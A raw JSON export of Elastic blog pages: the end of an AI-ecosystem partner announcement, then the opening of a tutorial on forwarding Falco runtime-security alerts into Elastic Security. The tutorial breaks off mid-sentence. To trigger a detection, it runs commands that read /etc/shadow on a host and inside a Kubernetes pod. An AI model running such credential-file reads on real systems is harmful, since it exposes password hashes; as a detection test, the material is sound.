from development to production,” \u003c/em\u003e\u003cem\u003e\u003cstrong\u003esaid\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003e Harrison Chase, co-founder and CEO at LangChain\u003c/strong\u003e\u003c/em\u003e\u003cem\u003e.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e\"Our collaboration with Elastic gives users robust tools for AI application development. LlamaIndex integration with Elasticsearch vector database lets users build highly capable agentic applications connected to their enterprise data,\" \u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003esaid Jerry Liu, CEO at Llamalndex\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(68, 71, 70);font-size: 12pt;\"\u003e\u003cem\u003e\"Protect AI is committed to building a safer AI-powered world,” \u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(68, 71, 70);font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003esaid Ian Swanson, CEO at Protect AI\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(68, 71, 70);font-size: 12pt;\"\u003e\u003cem\u003e.\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(68, 71, 70);font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(68, 71, 70);font-size: 12pt;\"\u003e\u003cem\u003e“Partnering with Elastic will allow us to bring our comprehensive platform to developers as they build AI applications with Elasticsearch.\"\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e“Our collaboration with Elastic allows developers to leverage the scalability and relevance of the Elasticsearch vector database directly within Vectorize.io's pipelines, streamlining the iterative development of high-quality retrieval augmented generation applications,\" \u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003esaid Chris Latimer, co-founder and CEO at Vectorize.io\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Build faster, deploy with confidence","_metadata":{"uid":"csae6574bed2f7fe4f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eVisit \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSearch Labs\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to explore the ever-growing library of developer resources on Elasticsearch vector database integrations.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe Elastic AI Ecosystem is rapidly evolving — visit the \u003c/span\u003e\u003ca href=\"http://www.elastic.co/partners/ai-ecosystem\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ehub\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to stay current.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAre you ready to accelerate your AI initiatives today? \u003c/span\u003e\u003ca href=\"https://events.elastic.co/elasticaipartnerecosystem\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eContact us\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to learn how to design, build, and deploy production-ready AI applications faster and easier than ever before.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs065a27a10c83542d"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs562bd6f2b5f1b53e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3cbdb24a96724bf4"}}}],"publish_date":"2024-11-14","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Elastic announces the Elastic AI Ecosystem","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Breaking down AI complexity: Your gateway to production-ready applications with Elasticsearch — the world's most downloaded vector database","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt9085022a5c6c87e9","ACL":{},"created_at":"2023-11-06T20:41:57.778Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"large-language-models","label_l10n":"Large language models","tags":[],"title":"Large language models","updated_at":"2023-11-06T20:42:13.486Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:28.432Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt99d975fbed690f0e","_version":1,"title":"Elastic Banner_13 (2).jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-14T01:06:09.064Z","updated_at":"2024-11-14T01:06:09.064Z","content_type":"image/jpeg","file_size":"150648","filename":"Elastic_Banner_13_(2).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-14T13:36:26.334Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt99d975fbed690f0e/67354d0197ce06409e479b24/Elastic_Banner_13_(2).jpg"},"title":"Accelerating AI innovation: Introducing the Elastic AI Ecosystem","title_l10n":"Accelerating AI innovation: Introducing the Elastic AI Ecosystem","updated_at":"2024-11-14T13:40:50.520Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-ai-ecosystem","publish_details":{"time":"2024-11-14T13:40:56.572Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt9a833acec4b1201c","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"Our latest integration of Falco with Elastic Security enhances our ability to detect threats at the edge, directly where they occur. Learn how we've extended Elastic's capabilities by adding connectors specifically for Falco.","author":["blt2e8b4b3b2dbfd83c","blt54039322e5a707c0"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-11-13T01:26:19.113Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3b00a94880b576fc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the modern IT ecosystem, securing containerized applications in environments like Kubernetes is vital. Tools like \u003c/span\u003e\u003ca href=\"https://falco.org/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eFalco\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e help address this need by providing tooling that can be integrated within Elastic Security. Falco is a cloud-native security tool that provides runtime security across hosts, containers, Kubernetes, and cloud environments. It leverages pre-defined, customizable Falco rules on Linux kernel events and other data sources through plugins, enabling the detection of abnormal behavior, potential security threats, and compliance violations.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eExpanding on our recent announcement of \u003c/span\u003e\u003ca href=\"http://www.elastic.co/blog/cncf-open-source-security-tools\" target=\"_self\"\u003e\u003cspan style='font-size: 12pt;'\u003eextended protections for cloud using CNCF open source security tools\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, this blog delves into how we've strengthened Elastic's capabilities by integrating with Falco.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The Falco and Elastic Security integration","_metadata":{"uid":"cs3bf7d89619a51457"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur latest integration of Falco with Elastic Security enhances our ability to detect threats at the edge — directly where they occur — within Kubernetes clusters, Linux virtual machines, or bare metal environments. We've extended Elastic's capabilities by adding connectors specifically for Falco, focusing on security enhancements that this integration brings to your cloud workload protection and endpoint security strategies.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis effort is part of our broader initiative to support third-party endpoint detection and response (EDR) and cloud workload protection (CWP) data sources, where we already have integrations with other major EDR providers like SentinelOne, CrowdStrike, and Microsoft Defender.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this blog, we’ll explore the new integration with Falco:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSetup:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Tips and considerations for setting up Falco with Elastic Security\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRules:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Understanding Falco's rule-based detection system\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEvents:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Techniques to ingest and interpret Falco logs and alerts natively in Kibana\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAlerts:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Strategies to enable centralized Falco alert management with Elastic Security\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eScenarios:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Showcasing Falco for cloud and endpoint security through attack simulation\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLet’s explore the synergy of Falco and Elastic for threat detection and response!\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Falco setup","_metadata":{"uid":"csed9deb2647d26b3c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis section provides a concise overview of setting up Falco with Elastic, with links for detailed instructions:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInstall Falco:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Deploy Falco as per your environment's guide in the \u003c/span\u003e\u003ca href=\"https://falco.org/docs/setup/\"\u003e\u003cspan style='font-size: 12pt;'\u003eFalco installation docs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eConfigure Falco:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e You can adjust Falco settings to your needs. The main installation details are on \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/ingest-falco.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic’s Falco setup page\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInstall and configure Falcosidekick: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eDeploy Falcosidekick per \u003c/span\u003e\u003ca href=\"https://github.com/falcosecurity/falcosidekick?tab=readme-ov-file#installation\"\u003e\u003cspan style='font-size: 12pt;'\u003eyour environment instructions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to forward logs to Elastic. Configure \u003c/span\u003e\u003ca href=\"https://falco.org/docs/outputs/forwarding/\"\u003e\u003cspan style='font-size: 12pt;'\u003ealert forwarding\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and the \u003c/span\u003e\u003ca href=\"https://github.com/falcosecurity/falcosidekick/blob/master/docs/outputs/elasticsearch.md\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch output\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs a reminder, if you are deploying Falco and Falcosidekick via Helm, you will need to set the appropriate Elasticsearch output values via \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003efalcosidekick.config.elasticsearch.\u0026lt;value\u0026gt;\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e or similarly via a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003evalues.yaml\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e file. \u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce these instructions are followed, you can test Falco by triggering a rule:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8463260bf2ef52e2"}}},{"code":{"code":"user@falco-de:~$ sudo cat /etc/shadow \u003e /dev/null\nuser@falco-de:~$ sudo journalctl _COMM=falco -p warning\n\nOct 24 07:48:07 falco-de falco[840]: {\"hostname\":\"falco-de\",\"output\":\"07:48:09.797276786: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow [...])","_metadata":{"uid":"cs34925035f557007a"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs24982e952a9c504c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAlternatively, for testing via Kubernetes — in this case, locally via \u003c/span\u003e\u003ca href=\"https://minikube.sigs.k8s.io/docs/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMinikube\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — you can use the following. For more details, see \u003c/span\u003e\u003ca href=\"https://falco.org/docs/getting-started/falco-kubernetes-quickstart/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eFalco’s Quick Start Guide\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs00d4a838848df4bf"}}},{"code":{"code":"user@falco-de:~$ kubectl exec -it \u003cname_of_pod\u003e -- cat /etc/shadow \u003e /dev/null\nuser@falco-de:~$ kubectl logs -l app.kubernetes.io/name=falco -n falco -c falco | grep Warning\n\n{\"hostname\":\"minikube\",\"output\":\"02:39:39.606463521: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow [...] ) ...","_metadata":{"uid":"cs7a49c3b676d026a3"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs27eed85d0a6150f1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce you have triggered a rule, check the Falcosidekick logs for successful POST requests to Elasticsearch. See examples below for expected output:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8a3134b6b00dda82"}}},{"code":{"code":"user@falco-de:~$ kubectl logs -l app.kubernetes.io/name=falcosidekick -n falco\n2024/10/28 11:48:09 [INFO] : Falco Sidekick version: 2.29.0\n2024/10/28 11:48:09 [INFO] : Enabled Outputs : [Elasticsearch]\n2024/10/28 11:48:09 [INFO] : Falcosidekick is up and listening on :2801\n2024/10/28 11:49:21 [INFO] : Elasticsearch - POST OK (201)","_metadata":{"uid":"csc7f674ee1245e390"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5524b8ea4d9fdb3e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith these successful requests, you should now be able to observe the forwarded event in Kibana.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs36771e4983c1c0fe"}}},{"image":{"image":{"uid":"bltc6153c49334b55c4","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T00:43:15.500Z","created_by":"bltb6c155cd84fc0c1a","file_size":"26540","filename":"image19.png","parent_uid":null,"tags":[],"title":"image19.png","updated_at":"2024-11-13T00:43:15.500Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.547Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc6153c49334b55c4/6733f62306af1f21e25c1c0d/image19.png"},"_metadata":{"uid":"cs1190bb22a1044763"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5f2c3813de4e97a9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor in-depth information on setting up Falco with Elastic, consult \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/ingest-falco.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic’s setup instructions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and the provided links mentioned above.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGenerally speaking, the data you will see in Elastic Security starts pre-filtered through Falco’s rules. However, you can add some very open-ended Falco rules if you want to see something more akin to a raw telemetry feed. A word of caution: Doing this can be very resource intensive depending on how open-ended your rules are and how many events occur on a given machine.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe next section will explain the nuances of Falco’s detection rulesets and how to enable them.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Falco rules","_metadata":{"uid":"cs95d062b03730f8f5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://falco.org/docs/rules/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eFalco rules\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e are customized detection patterns that monitor system activities for signs of security breaches or misbehavior. They focus on:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSystem calls:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Detecting unauthorized system calls\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eFile access:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Monitoring unexpected file modifications or access\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNetwork activity:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Observing unusual network connections or data transfers\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eProcess execution:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Tracking processes that might indicate malicious behavior like spawning shells or accessing sensitive files\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTheir primary aim is to detect threats within containerized setups by identifying behaviors indicative of attacks providing real-time security monitoring for cloud-native infrastructures.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFalco organizes its \u003c/span\u003e\u003ca href=\"https://github.com/falcosecurity/rules/tree/main/rules\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003edetection rules\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e into three maturity levels to help users manage the balance between detection capabilities and rule stability:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://github.com/falcosecurity/rules/blob/main/rules/falco_rules.yaml\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eMain rules\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Stable, production-ready, detects common threats\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://github.com/falcosecurity/rules/blob/main/rules/falco-incubating_rules.yaml\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eIncubating rules\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Evolving, new detection with some testing, might need tuning\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://github.com/falcosecurity/rules/blob/main/rules/falco-sandbox_rules.yaml\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSandbox rules\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Experimental, high false positive rate, for catching new threats\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe main rules are enabled by default. The rule categories mentioned above can be added to Falco’s configuration to increase detection coverage (and false positives).\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis can be done by first downloading and moving these incubating and sandbox rule files to the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e/etc/falco/rules.d/\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e directory:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7f5d8575baa22a09"}}},{"code":{"code":"user@falco-de:~$ ls -lah /etc/falco/rules.d/\ntotal 160K\ndrwxr-xr-x 2 root root 4.0K Oct 28 07:09 .\ndrwxr-xr-x 4 root root 4.0K Oct 28 07:09 ..\n-rw-r--r-- 1 root root 65K Oct 28 07:08 falco-incubating_rules.yaml\n-rw-r--r-- 1 root root 82K Oct 28 07:09 falco-sandbox_rules.yaml","_metadata":{"uid":"cs338d606be998dd02"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb2eb446d83e6ab4f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe default \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e/etc/falco/falco.yaml\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e configuration file will then pick up on these rules.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs32180f6188529d97"}}},{"code":{"code":"rules_files:\n - /etc/falco/falco_rules.yaml\n - /etc/falco/falco_rules.local.yaml\n - /etc/falco/rules.d","_metadata":{"uid":"csd93c36e4187f6581"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2fc33d22b95f3353"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAfter restarting the Falco service, you can immediately start experimenting with Falco's security monitoring rulesets.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the next section, we will take a look at the fields that are available in Falco alert documents and how these fields can enable effective threat detection.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Falco events ingested as Elastic documents","_metadata":{"uid":"cs0d606507ca185f18"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFalco supports the ingestion of various types of events into Elasticsearch. An ingest pipeline with several processors was created to convert Falco alerts to ECS. But before we can use this pipeline, we need to install it.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFalco alerts can be ingested through various methods — one method being the Elastic Agent Falco integration, and the other method being through Falcosidekick. In this blog, we are using Falcosidekick, so we will not need the Falco integration. We do, however, need the Falco integration’s assets, as the ingest pipeline to parse Falco documents is part of this package. Failing to install the ingest pipeline will result in unparsed Falco documents.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cspan style='font-size: 12pt;'\u003eWhen searching for the Falco integration in the Kibana integrations tab, we can install its assets by clicking 